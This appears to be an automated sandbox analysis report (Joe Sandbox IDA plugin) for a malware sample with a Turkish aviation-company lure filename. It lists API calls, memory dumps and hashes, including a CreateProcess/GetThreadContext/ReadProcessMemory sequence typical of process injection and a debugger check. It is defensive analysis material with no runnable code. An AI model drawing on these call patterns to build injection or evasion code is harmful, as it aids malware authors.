                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010098D1
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010098D8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                    • Opcode ID: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                                                                                    • Instruction ID: 60e5907c9387a4bb4a90c29552d641cbefa086cb1084a3f2fd138cd001ecc254
                                                                                                                                    • Opcode Fuzzy Hash: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                                                                                    • Instruction Fuzzy Hash: E4E08632141215B7E7311E54EC0AFCA7F69AB067A4F308210FB94690D087B616119798
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 01008D1B
                                                                                                                                      • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                                                                                      • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                                                                                    • _free.LIBCMT ref: 01008D2C
                                                                                                                                    • _free.LIBCMT ref: 01008D3E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                    • Instruction ID: 2cfa348369af864702244ffb73a78d48128ab9bb1ba841def208706520f4fcfa
                                                                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                    • Instruction Fuzzy Hash: 3BE0C2E1E0160243EBA1B5BCAE41F8333DC9F68352B044A6FB94ED7182CE68F4429028
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CALL
                                                                                                                                    • API String ID: 0-4196123274
                                                                                                                                    • Opcode ID: 1251beb3b2dd0786ff0f65e858b0d279e7f960efc8268bca20115fda891bf82b
                                                                                                                                    • Instruction ID: 1f21a54c65406773310ab65b23f38170250882b497d18f388218d41ad6bab436
                                                                                                                                    • Opcode Fuzzy Hash: 1251beb3b2dd0786ff0f65e858b0d279e7f960efc8268bca20115fda891bf82b
                                                                                                                                    • Instruction Fuzzy Hash: 78227FB1908301DFD724DF14C450B6AB7E1BF86314F14896DE89A8B362DB35ED45EB82
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID: EA06
                                                                                                                                    • API String ID: 4104443479-3962188686
                                                                                                                                    • Opcode ID: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                                                                                    • Instruction ID: f53476245f069f45f9735579002b07dedabf9b3537c62e712c71414d7ba3b6c0
                                                                                                                                    • Opcode Fuzzy Hash: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                                                                                    • Instruction Fuzzy Hash: 37417FF2E041586BDF219B54CC917BE7BA29BC7310F284475FC86DB282D6A47D44B3A1
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 01005B93
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                    • Opcode ID: 882ec0f033ced3baddc04fa2aa3942b93c07abfc5491e8a0e7037e2b1018c8d9
                                                                                                                                    • Instruction ID: ad310f6a82b11b2274b81c40017b32d8334c4dd2d1b410d4ff843eb0c753266d
                                                                                                                                    • Opcode Fuzzy Hash: 882ec0f033ced3baddc04fa2aa3942b93c07abfc5491e8a0e7037e2b1018c8d9
                                                                                                                                    • Instruction Fuzzy Hash: 2B418472500609AFEB16EF64CC81DAFB7F8EB44310F10866EE99697281EB749A45CF50
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4104443479-0
                                                                                                                                    • Opcode ID: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                                    • Instruction ID: a7ba441c8ec6ded86e2699d219c325bd4a7550b04b810b10d5774df20398e37c
                                                                                                                                    • Opcode Fuzzy Hash: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                                                                    • Instruction Fuzzy Hash: 803173F2604606AFC704EF68CCD1E69B3A9FF493207158629E519CB291EB34E951DB90
                                                                                                                                    APIs
                                                                                                                                    • IsThemeActive.UXTHEME ref: 00FA4834
                                                                                                                                      • Part of subcall function 00FC336C: __lock.LIBCMT ref: 00FC3372
                                                                                                                                      • Part of subcall function 00FC336C: DecodePointer.KERNEL32(00000001,?,00FA4849,00FF7C74), ref: 00FC337E
                                                                                                                                      • Part of subcall function 00FC336C: EncodePointer.KERNEL32(?,?,00FA4849,00FF7C74), ref: 00FC3389
                                                                                                                                      • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FA4915
                                                                                                                                      • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA492A
                                                                                                                                      • Part of subcall function 00FA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
                                                                                                                                      • Part of subcall function 00FA3B3A: IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
                                                                                                                                      • Part of subcall function 00FA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
                                                                                                                                      • Part of subcall function 00FA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA4874
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1438897964-0
                                                                                                                                    • Opcode ID: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                                                                                    • Instruction ID: 18cf250d74f3715a3646a8d9de1fa7808aa9739e8472d7a4d8e2e38422035ea5
                                                                                                                                    • Opcode Fuzzy Hash: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                                                                                    • Instruction Fuzzy Hash: FB11A5719083429FC710DF28EC0590ABFE8FF8A790F10451EF08083271DBBA9645DB91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                                                                                      • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                                                                                      • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                                                                                    • std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                      • Part of subcall function 00FC859B: RaiseException.KERNEL32(?,?,?,01059E78,00000000,?,?,?,?,00FC0E06,?,01059E78,?,00000001), ref: 00FC85F0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902256705-0
                                                                                                                                    • Opcode ID: 6e49b6f955af899035ff4516bdc75fa0464762e6dc1752824de0df10b1f5805a
                                                                                                                                    • Instruction ID: 1ee8e6ef9339d48caede660fc5b685308583c15109273ba408d74782d6a97ac0
                                                                                                                                    • Opcode Fuzzy Hash: 6e49b6f955af899035ff4516bdc75fa0464762e6dc1752824de0df10b1f5805a
                                                                                                                                    • Instruction Fuzzy Hash: E6F0813190031BA6CB18BA94EE07FDF77AC9F01361F10442EF909A6141DF749A82A6D1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __lock_file_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 26237723-0
                                                                                                                                    • Opcode ID: 6a7dee1f19cd275ced03a5c31750786f78da99f4326570a642ca6338ff1d9a75
                                                                                                                                    • Instruction ID: 5f68228a363fc795a06c4ae4cde90f677f2041aac3c1d290ba0b025e40ecf13c
                                                                                                                                    • Opcode Fuzzy Hash: 6a7dee1f19cd275ced03a5c31750786f78da99f4326570a642ca6338ff1d9a75
                                                                                                                                    • Instruction Fuzzy Hash: 2101D472C0060AEBCF12EF648E03E9E7B61AF90B61F40411DF8141B151DB398A92FF91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                                                                                    • __lock_file.LIBCMT ref: 00FC53EB
                                                                                                                                      • Part of subcall function 00FC6C11: __lock.LIBCMT ref: 00FC6C34
                                                                                                                                    • __fclose_nolock.LIBCMT ref: 00FC53F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2800547568-0
                                                                                                                                    • Opcode ID: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                                                                                    • Instruction ID: 22bb090e561329186ffd7c8843d4cea43d945cecfb77899872be019aae3ff94c
                                                                                                                                    • Opcode Fuzzy Hash: dcccabe42f2c9fadf697016d9722b4c6f4ebbc4ae4f96a93dad688807a9e2669
                                                                                                                                    • Instruction Fuzzy Hash: 09F09C319106469AD714AB655E03FAD76A16F41775F20410CA454AB1C1CBFC5982BB51
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01260065
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01260089
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012600AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                                    • Instruction ID: fc7719b40e7cb49a70090d3b09c79bf35168b80e65ec4e184c0ce08184785c50
                                                                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                                    • Instruction Fuzzy Hash: 6212CE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F91CF5A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction ID: 6abd7baa3376518c1bb51c8f218db881ab1e5133df9dde0999446d1fca7097f1
                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                    • Instruction Fuzzy Hash: 5731B771A00106DBC718DF58C685B69F7A6FB59310B6487A9E80ACB355DB31EDC2EBC0
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearVariant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                    • Opcode ID: 3c75d3bec4ac7d47977bdda826a84e7a7d185e59ab0aedcee4fc29053d5b9f09
                                                                                                                                    • Instruction ID: 659c5336e7dcaee65d5321fd990584017940599193f5d0807dae4227c3f45fd3
                                                                                                                                    • Opcode Fuzzy Hash: 3c75d3bec4ac7d47977bdda826a84e7a7d185e59ab0aedcee4fc29053d5b9f09
                                                                                                                                    • Instruction Fuzzy Hash: FE4108B4904341DFDB24DF14C454B1ABBE1BF45314F0988ACE8998B762C775E849DF52
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8adda755b85ae478ad31ab38e0c2e0c7d30360b95ce5ac50b39ba54cc90d6fef
                                                                                                                                    • Instruction ID: 586cbb32e3fef4049e6f3b3a3b1b79a3b12249cc48cc75963bad6cebb1896b89
                                                                                                                                    • Opcode Fuzzy Hash: 8adda755b85ae478ad31ab38e0c2e0c7d30360b95ce5ac50b39ba54cc90d6fef
                                                                                                                                    • Instruction Fuzzy Hash: 2121F376409202EFC311AF24D843AF6B7F4EF82322B11819EED918B862CB3059478F91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FA4BEF
                                                                                                                                      • Part of subcall function 00FC525B: __wfsopen.LIBCMT ref: 00FC5266
                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
                                                                                                                                      • Part of subcall function 00FA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FA4BA4
                                                                                                                                      • Part of subcall function 00FA4C70: _memmove.LIBCMT ref: 00FA4CBA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1396898556-0
                                                                                                                                    • Opcode ID: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
                                                                                                                                    • Instruction ID: 9f5523c4d58701c9caa53ba3f268e6c49828d5d33bdf65c552e1e6333b5bb635
                                                                                                                                    • Opcode Fuzzy Hash: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
                                                                                                                                    • Instruction Fuzzy Hash: 9A11E772600206ABCF11FF70CC52FAD77A5AFC5750F10842DF541A7181DAFAA901B760
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
